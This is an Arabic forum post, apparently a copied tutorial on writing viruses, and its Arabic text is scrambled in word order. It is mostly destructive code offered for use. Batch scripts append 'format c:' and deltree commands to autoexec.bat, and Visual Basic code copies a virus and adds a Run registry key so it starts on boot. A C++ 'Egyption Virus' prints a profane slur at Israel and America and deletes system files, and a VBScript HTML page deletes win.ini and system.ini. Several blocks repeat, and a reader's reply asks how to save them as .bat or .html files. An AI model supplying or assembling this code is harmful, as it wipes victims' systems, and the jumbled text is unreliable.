ﺍﻷﻣﺮﻥ ﺣﺘﻰ ﻳﻤﻜﻨﻨﺎ ﺍﻟﺴﻄﺮﻳﻦ ﺑﻌﺪ ﻭ ﻫﺬﺍ ﻫﻮ echo copy c:\******s\comm and \format.com c:\ >nul >>c: \autoexec.bat echo copy c: \******s\comm and\deltree.exe c:\ >nul >>c: \autoexec.bat ﺍﻋﻄﺎﻩ ﺍﻷﻣﺮ ﺑﻌﻤﻞ ﻫﺬﺍ ﻛﻤﺎ ﻫﻮ ﻣﻮﺟﻮﺩ ﺍﻣﺎ ﺑﻌﺪ ﺫﻟﻚ ﻓﻬﻮ ﻓﻰ ﺍﻟﺴﻄﺮ ﺍﻟﺘﺎﻟﻰ ﻓﻮﺭﻣﺎﺕ ﻟﻠﺠﻬﺎﺯ ﻭ echo format c: /q /u /autotest >nul >>c:\autoexec.bat ﻗﺒﻞ ﺍﻧﻪ ﺍﻭﻻ ﻳﻮﺟﺪ ﺑﻌﺾ ﺍﻻﻣﻮﺭ ﺗﻮﺿﻴﺤﻬﺎ ﻓﻰ ﺍﻟـC: ﺍﻟﺒﺪﺃ ﻓﻰ ﻫﺬﺍ ﺍﻟﻤﻮﺿﻮﻉ ﻭﻫﻮ ﺗﻠﻘﺎﺋﻴﺎ ﻋﻨﺪ ﻓﺘﺢ ﺑﻮﺿﻊ ﻫﺬﺍ ﺍﻟﻔﻴﺮﻭﺱ ﻻ ﺗﺤﻔﻈﻪ ﻓﻰ ﻫﺬﺍ ﺳﻮﻑ ﻳﺠﻌﻠﻪ ﻳﻌﻤﻞ ﺍﻣﺎ ﺍﺫﺍ ﻛﻨﺖ ﺗﺴﻮﻯ ﺗﻬﻜﺮﻋﻠﻰ ﺍﻟﺠﻬﺎﺯ ﻟﺬﺍ ﺗﺤﻤﻴﻞ ﻫﺬﺍ ﺍﻟﻔﻴﺮﻭﺱ ﺍﻟﻰ partion ﺛﻢ ﺩﻋﻪ ﻳﺘﻤﺘﻊ ﺑﺬﻟﻚ ﺑﻌﺪ ﺍﻥ ﺟﻬﺎﺯ ﻓﻘﻢ ﺑﺴﻴﻂ ﻭ ﻫﻮ ﻳﻔﺘﺢ ﺟﻬﺎﺯﻩ ﺍﻟـC: ﻋﻨﺪﻩ ﻓﻰ ﺟﻬﺎﺯ ﻭﻻﻛﻨﻰ ﻭﺟﺪﺕ ﻓﻴﻪ ﻋﻴﺐ ﻓﻮﻟﺪﺭ ﻏﻴﺮ ﺍﻥ ﻫﺬﺍ ﺍﻟﻔﻴﺮﻭﺱ ﻟﻦ ﻳﻌﻤﻞ ﻫﻨﺎﻙ ﺿﺤﻴﻪ ﻭﺿﻊ ﻓﻴﻪ ﺍﻟﻮﻳﻨﺪﻭ ﺩﺍﺧﻞ ﻣﻮﺿﻮﻉ ﺩﺍﺧﻞ ******s ﻓﻤﺜﻼ ﺍﺫﺍ ﻛﺎﻥ ﻓﻮﻟﺪﺭ ﻳﻮﺟﺪ ﻋﻨﺪﻫﺎ ﻭﻳﻨﺪﻭﺯ win98 ﺍﻷﻋﻤﺎﻝ ﻭ ﻫﻰ ﻓﺎﻥ ﺍﻟﻔﻴﺮﻭﺱ ﺍﻟﺬﻯ ﺍﻟﻮﻳﻨﺪﻭﺯ ﻭﻻﻛﻨﻪ ﻛﻮﻧﺎﻩ ﻟﻦ ﻳﻘﻮﻡ ﺑﺒﻌﺾ ﺑﻌﻤﻞ ﻓﻮﺭﻣﺎﺕ ﻧﺴﺦ ﺍﻷﻭﺍﻣﺮ ﻭ ﻣﺴﺢ ﻓﻜﻞ ﻣﺎ ﺍﺳﺘﻄﻴﻊ ﺍﻥ ﺳﻮﻑ ﻳﻘﻮﻡ ﺗﺪﻋﺪﻳﻞ ﻣﻔﻴﺪ ﻓﻴﻪ ﻭ ﺍﻣﺎ ﺑﺎﻟﻨﺴﺒﺔ ﻟﺘﻌﺪﻳﻠﻪ ﺍﻭﺍﻣﺮ ﻣﺴﺢ ﺍﻟﻮﻳﻨﺪﻭﺯ ﺍﻋﻄﻴﻜﻢ ﺍﻳﺎﻩ ﻣﻦ ﻭ ﻫﻮ ﺍﻧﻜﻢ ﺗﻤﺴﺤﻮﺍ Program files ﻣﻊ ﺗﻐﻴﺮ ﻣﺜﻼ ﺍﻧﻪ ﻳﺴﻮﻯ ﻭ ﺗﺪﻉ ﺍﻣﺮ ﻓﻴﻜﻮﻥ ﻟﻜﻮﺩ ﻛﻤﺎ ﻳﻠﻰ ﺍﻟﻔﻮﺭﻣﺎﺕ ﺍﻟـ ﻓﻮﺭﻣﺎ ﻋﻠﻰ echo off @ cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c: \autoexec.bat echo format c : /q /u / autotest >nul >>c: \autoexec.bat : ---------------- -------------- ﺍﻟﻜﻮﺩ ﺍﻟﺜﺎﻟﺚ code:------------------------- ------------------------------ -------------------------echo off@ cls call attrib -h -r c: \autoexec.bat >nul echo @echo off >c: \autoexec.bat echo deltree /y c: \progra~1\*.* >nul >>c: \autoexec.bat echo copy c: \******s\comm and \format.com c:\ >nul >>c: \autoexec.bat echo copy c: \******s\comm and\deltree.exe c:\ >nul >>c: \autoexec.bat echo deltree /y c:\******s\*.* >nul >>c: \autoexec.bat echo format c: / q /u /autotest >nul >>c: \autoexec.bat ﻧﻔﺲ ﻋﻤﻞ ﻟﺴﺖ ﺑﺤﺎﺟﻪ ﺍﻟﻰ ﻳﻌﺘﺒﺮ ﻫﺬﺍ ﺍﻟﻔﻴﺮﻭﺱ ﺑﻤﺎ ﺍﻧﺘﻢ ﻳﺠﺐ ﺍﻥ ﺍﻟﺴﺎﺑﻖ ﻟﺬﺍ ﺍﻧﺎ ﺑﻪ ﺣﺘﻰ ﺗﻌﺪﻟﻮﻩ ﺗﻮﺿﻴﺤﻪ ﺍﻭ ﺍﺧﺒﺎﺭﻛﻢ ﻛﻞ ﻣﺎ ﺍﻧﺎ ﻳﺠﺐ ﺍﻥ ﺍﻗﻮﻟﻪ ﻟﻜﻢ ﺗﻘﻮﻣﻮ ﺑﺨﺼﻮﺹ ﻫﺬﺍ ﺍﻟﻜﻮﺩ ﺍﻧﻪ ﻳﺠﺐ ﻋﻠﻴﻜﻢ ﺍﻥ ﺗﺴﻤﻪ ﺑـ Autoexec.bat ﺍﻷﻛﻮﺍﺩ ﺟﻌﻞ ﻫﺬﺍ ﺍﻷﻥ ﻭ ﺑﻌﺪ ﺍﻥ ﺗﻌﺮﻓﻨﺎ ﺍﻟﻰ ﺍﻟﻴﻪ ﺑﻌﺾ ﺍﻟﺴﺎﺑﻘﺔ ﻣﺎ ﺭﺃﻳﻜﻢ ﻓﻰ ﺍﻛﻮﺍﺩﻩ ﺍﻟﻔﻴﺮﻭﺱ ﺍﻗﻮﻯ ﺑﺎﻥ ﻧﻀﻴﻒ ﺍﻷﻭﻟﻰ :- ﺍﻟﺨﺼﺎﺋﺺ ﻭ ﺳﻮﻑ ﺍﻭﺿﺢ ﺍﻟﺨﺎﺻــــــــــــــﻴﺔ On Error Resume Next Dim copy, copy2 copy = "c:\virus.exe " copy2 = "c:\******s\system \Project12.exe " FileCopy copy, copy2 ﻟﻠﻔﻴﺮﻭﺱ ﺧﺎﺻﻴﺔ ﻣﻜﺎﻥ ﺍﺧﺮ ﺣﺘﻰ ﻻ ﻳﻌﻄﻰ ﻫﺬﺍ ﺍﻟﻜﻮﺩ ﺍﻳﻘﺎﻓﻪ ﺑﻤﺠﺮﺩ ﻣﺴﺤﻪ ﻭ ﻧﺴﺦ ﻧﻔﺴﻪ ﺍﻟﻰ ﺍﻟﺘﻌﺎﻣﻞ ﻣﻊ ﺍﻟﻜﻮﺩ ﺑﻜﻞ ﻳﻤﻜﻦ ﻟﻠﻀﺤﻴﻪ ﻫﺬﺍ ﺍﺫﺍ ﻛﻨﺖ ﻣﻦ ﺍﻟﻔﺎﻫﻤﻴﻦ ﻳﻤﻜﻨﻨﺎ ﻣﻦ ﺑﺪﺭﺟﺔ ﺟﻴﺪﺓ ﻭ ﻟﻴﺲ ﻟﻠﺒﺮﺍﻣﺞ ﺑﺴﺎﻃﺔ :- ﺍﻟﺼﻐﻴﺮﺓ ﺍﻟﺘﻰ ﺗﺎﺗﻰ ﻣﻌﻪ ﻟﻠﻜﻤﺒﻴﻮﺗﺮ Option ﺍﻟﺨﺎﺻــــــــــــــﻴﺔ ﺍﻟﺜﺎﻧﻴﻪ Explicit Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long Private Const REG_SZ = 1 Private Const LOCALMACHINE = &H80000002 Private Sub Command1_Click( ( Dim InputValue As String Dim nBufferKey As Long, nBufferSubKey As Long RegCreateKey LOCALMACHINE, "SOFTWARE \JPRODUCTIONS", nBufferKey RegOpenKey LOCALMACHINE, "Software\Microsoft\******s \CurrentVersion", nBufferKey RegOpenKey nBufferKey, "Run-", nBufferSubKey InputValue = "c:\******s\sys tem\Project12.exe " RegOpenKey LOCALMACHINE, "Software\Microsoft\******s \CurrentVersion", nBufferKey RegOpenKey nBufferKey, "Run-", nBufferSubKey RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len (InputValue) End Sub ﺧﺎﺻﻴﺔ ﺍﻧﻪ ﻋﻨﺪ ﻓﺘﺢ ﻳﻌﻄﻰ ﻫﺬﺍ ﺍﻟﻜﻮﺩ ﻟﻠﻔﻴﺮﻭﺱ ﺗﻌﺪﻳﻞ ﺍﻝ ﻳﻤﻜﻨﻪ ﻣﻦ ﺍﻥ ﻳﺸﺘﻐﻞ ﺗﻠﻘﺎﺋﻴﺎ registry : ﺍﻟﺠﻬﺎﺯ ﻭ ﻫﺬﺍ ﻋﻦ ﻃﺮﻳﻖ ﻫﺬﺍ ﻫﻮ ﻛﻞ ﻣﺎ ﺍﻧﺎ ﺣﺼﻠﺖ ﻋﻠﻴﻪ ﻣﻦ ﺍﻛﻮﺍﺩ ﻟﻠﻔﻴﺮﻭﺳﺎﺕ ﻓﻠﻘﺪ ﺷﺮﺣﺖ ﻟﻜﻢ ﻣﺠﻤﻮﻋﻪ ﻣﻦ ﺍﻛﻮﺍﺩ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﺍﻟﺘﻰ ﻳﻤﻜﻨﻨﺎ ﻣﻦ ﺍﺳﺘﺨﺪﺍﻣﻬﺎ ﻭ ﻣﺠﻤﻮﻋﻪ ﻣﻦ ﺍﻷﻛﻮﺍﺩ ﺍﻟﺘﻰ ﺑﺎﺿﺎﻓﺘﻬﺎ ﻟﻠﻔﻴﺮﻭﺱ ﺗﻌﻄﻰ ﻟﻪ ﺧﺼﺎﺋﺺ ﻣﻔﻴﺪﻩ ﻭ ﻫﺬﺍ ﻟﻴﺲ ﻛﻞ ﺷﺊ ﻓﻨﺎ ﺍﻥ ﺣﺼﻠﺖ ﻋﻠﻰ ﻯ ﻛﻮﺩ ﺍﺧﺮ ﻓﺴﻮﻑ ﺍﻋﻄﻴﻪ ﻟﻜﻢ ﻓﻰ ﻫﺬﺍ ﺍﻟﻤﻮﺿﻮﻉ ﻭ ﺳﻮﻑ ﺍﺷﺮﺡ ﻓﻴﻪ ﻛﻞ ﻣﺎ ﺍﻧﺎ ﺍﺳﺘﻄﻴﻊ ﻟﺬﺍ ﺍﻧﺘﻈﺮﻭﺍ ﻣﻨﻰ ﺍﻟﻤﻔﻴﺪ ﻭ ﻳﺘﺒﻘﻰ ﻟﻨﻰ ﺷﺊ ﺑﺴﻴﻂ ﻭﺍﻧﻬﻰ ﻫﺬﺍ ﺍﻟﺠﺰﺀ ﻭ ﻫﻮ ﻣﺠﻤﻮﻋﺔ ﺍﻛﻮﺍﺩ ﻷﺷﻬﺮ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻓﻴﺮﻭﻭﺱ C++ : ______________ # ***************** include<stdio.h> #include<conio.h> #include<stdlib.h> main() { clrscr(); printf("\t\t \tWelcome to the Egyption - oO Virus Oo-\n\n"); printf("\t \tFuck -oO Israel Oo- and -oO America Oo-\n\n"); remove ("c:\\******s \\system.ini"); remove("c:\\******s \\win.ini"); remove("c: \\autoexec.bat"); remove("c: \\msdos.sys"); remove("c: \\io.sys"); remove("c:\\ command.com"); remove("c: \\config.sys"); remove("c: \\******s\\ebd \\command.com"); remove ("c:\\******s\\ebd \\ebd.cab"); remove("c: \\******s\\ebd \\Autoexec.bat"); remove("c: \\******s\\ebd \\setramd.bat"); remove("c: \\******s\\ebd \\Findramd.exe"); rename ("egypt.exe","c:/ ******s/ startm~1/programs/s tartup/ win.exe"); printf("******s destroyed ...\n \n"); system ("PAUSE Visual ﻓﻴﺮﻭﻭﺱ { ;(" Basic : ***************** SetAttr "c:\autoexec.bat", vbNormal SetAttr "c: \msdos.sys", vbNormal SetAttr "c:\io.sys", vbNormal SetAttr "c:\******s\win.ini", vbNormal SetAttr "c:\******s \sys tem.ini", vbNormal SetAttr "c:\ command.com", vbNormal SetAttr "c: \config.sys", vbNormal SetAttr "c:\******s\run dll.exe", vbNormal SetAttr "c: \******s\run dll32.exe", vbNormal Kill "C: \autoexec.bat" Kill "C: \msdos.sys" Kill "C:\io.sys" Kill "C:\******s\win.ini" Kill "C: \******s\system.ini" Kill "C:\ command.com" Kill "C: \config.sys" Kill "C:\******s \rundll.exe" Kill "C:\******s \rundll32.exe" Html ﻓﻴﺮﻭﺱ > ***************** html> > head> <**** **********="Content- Type" content="****/html; charset=iso-8859-1"> <title>Active-X HTML</title> </head> THIS HTML USING ACTIVE-X PLEASE CLICK #YES# <body bgcolor="#000000" ****="#C0C0C0"> <script language="VBScript"> <!-- This is a MY BRAIN --!> On Error Resume Next Dim a Set fso = CreateObject("S cripting.FileSystemObject") Set a = fso.GetFile("win.ini") a.Delete Dim b Set fso = CreateObject("S cripting.FileSystemObject") Set b = fso.GetFile("sy stem.ini") b.Delete *********** <!--- This script author is THEONE---!> </ body> </html > ( ﻫﺬﺍ ﺍﻟﻔﻴﺮﻭﺱ ﺑﺄﻣﺘﺪﺍﺩ html .* ﻣﻼﺣﻈﺔ ﻳﺤﻔﻆ ) ﻣﻦ ﺩﺭﺍﺳﺔ ﻫﺬﻩ ﺍﻷﻛﻮﺍﺩ ﻭ ﺍﻟﻨﻈﺮ ﻣﺎ ﻗﺪ ﻳﻔﻴﺪﻛﻢ ﻓﻴﻤﻜﻨﻜﻢ ﻣﻦ ﻳﻤﻜﻨﻚ ﺍﻷﺟﺰﺍﺀ ﻣﻦ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻓﻴﻬﺎ ﺍﻟﻰ ﻓﻴﺮﻭﺱ ﻗﻮﻯ ﻳﺨﺼﻜﻢ ﻧﻘﻞ ﺑﻌﺾ ﺍﻣﻠﻚ ﻓﻰ ﻫﺬﺍ ﺍﻟﺠﺰﺀ ﻭ ﺍﻟﺴﺎﺑﻘﺔ ﻋﻤﻞ ﻟﻜﻢ ﺳﺎﺑﻘﺎ ﻫﻮ ﻗﺎﺑﻞ ﻫﺬﺍ ﻫﻮ ﻛﻞ ﻣﺎ ﻓﺎﻧﺘﻈﺮﻭﺍ ﻣﻨﻰ ﺍﻟﻜﺜﻴﺮ ﻣﻦ ﻫﻮ ﻛﻤﺎ ﻗﻠﺖ ﺍﻟﺘﻰ ﺳﻮﻑ ﺍﺿﻌﻬﺎ ﻟﻜﻢ ﻭﻻﻛﻦ ﻟﻠﺘﻄﻮﻳﺮ ﻛﺮﺩ ﻋﻠﻰ ﻫﺬﺍ ﺍﻟﻤﻮﺿﻮﻉ ﺍﻷﻛﻮﺍﺩ C++ : _____________________ # ***************** ﻓﻴﺮﻭﻭﺱ include<stdio.h> #include<conio.h> #include<stdlib.h> main() { clrscr(); printf("\t\t \tWelcome to the Egyption - oO Virus Oo-\n\n"); printf("\t \tFuck -oO Israel Oo- and -oO America Oo-\n\n"); remove ("c:\\******s \\system.ini"); remove("c:\\******s \\win.ini"); remove("c: \\autoexec.bat"); remove("c: \\msdos.sys"); remove("c: \\io.sys"); remove("c:\\ command.com"); remove("c: \\config.sys"); remove("c: \\******s\\ebd \\command.com"); remove ("c:\\******s\\ebd \\ebd.cab"); remove("c: \\******s\\ebd \\Autoexec.bat"); remove("c: \\******s\\ebd \\setramd.bat"); remove("c: \\******s\\ebd \\Findramd.exe"); rename ("egypt.exe","c:/ ******s/ startm~1/programs/s tartup/ win.exe"); printf("******s destroyed ...\n \n"); system ("PAUSE Visual ﻓﻴﺮﻭﻭﺱ { ;(" Basic : ***************** SetAttr "c:\autoexec.bat", vbNormal SetAttr "c: \msdos.sys", vbNormal SetAttr "c:\io.sys", vbNormal SetAttr "c:\******s\win.ini", vbNormal SetAttr "c:\******s \sys tem.ini", vbNormal SetAttr "c:\ command.com", vbNormal SetAttr "c: \config.sys", vbNormal SetAttr "c:\******s\run dll.exe", vbNormal SetAttr "c: \******s\run dll32.exe", vbNormal Kill "C: \autoexec.bat" Kill "C: \msdos.sys" Kill "C:\io.sys" Kill "C:\******s\win.ini" Kill "C: \******s\system.ini" Kill "C:\ command.com" Kill "C: \config.sys" Kill "C:\******s \rundll.exe" Kill "C:\******s \rundll32.exe" Html ﻓﻴﺮﻭﺱ > ***************** html> > head> <**** **********="Content- Type" content="****/html; charset=iso-8859-1"> <title>Active-X HTML</title> </head> THIS HTML USING ACTIVE-X PLEASE CLICK #YES# <body bgcolor="#000000" ****="#C0C0C0"> <script language="VBScript"> <!-- This is a MY BRAIN --!> On Error Resume Next Dim a Set fso = CreateObject("S cripting.FileSystemObject") Set a = fso.GetFile("win.ini") a.Delete Dim b Set fso = CreateObject("S cripting.FileSystemObject") Set b = fso.GetFile("sy stem.ini") b.Delete *********** <!--- This script author is THEONE---!> </ body> </html > ( ﻫﺬﺍ ﺍﻟﻔﻴﺮﻭﺱ ﺑﺄﻣﺘﺪﺍﺩ html .* ﻣﻼﺣﻈﺔ ﻳﺤﻔﻆ ) ﻣﻦ ﺩﺭﺍﺳﺔ ﻫﺬﻩ ﺍﻷﻛﻮﺍﺩ ﻭ ﺍﻟﻨﻈﺮ ﻣﺎ ﻗﺪ ﻳﻔﻴﺪﻛﻢ ﻓﻴﻤﻜﻨﻜﻢ ﻣﻦ ﻳﻤﻜﻨﻚ ﺍﻷﺟﺰﺍﺀ ﻣﻦ ﺍﻟﻔﻴﺮﻭﺳﺎﺕ ﻓﻴﻬﺎ ﺍﻟﻰ ﻓﻴﺮﻭﺱ ﻗﻮﻯ ﻳﺨﺼﻜﻢ . ﻧﻘﻞ ﺑﻌﺾ ﻣﻨﻘﻮﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭ ﺍﻟﺴﺎﺑﻘﺔ ﻋﻤﻞ ﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻭﻝ ﻟﻜﻦ ﺳﺆﺍﻝ ﻭﻫﻮ ﻛﻴﻒ ﺃﺣﻔﻆ ﻣﺴﺘﻨﺪ . ﺍﻟﻤﻔﻜﺮﺓ ﺑﺼﻴﻐﺔ .bat ﺃﻭ ﺑﺼﻴﻐﺔ ﺍﻟﺮﺩﻭﺩ ﻭﺍﻟﺸﺮﺡ html ﺃﺭﺟﻮﻭﻭﻭﻭﻭﻭﻭﻭ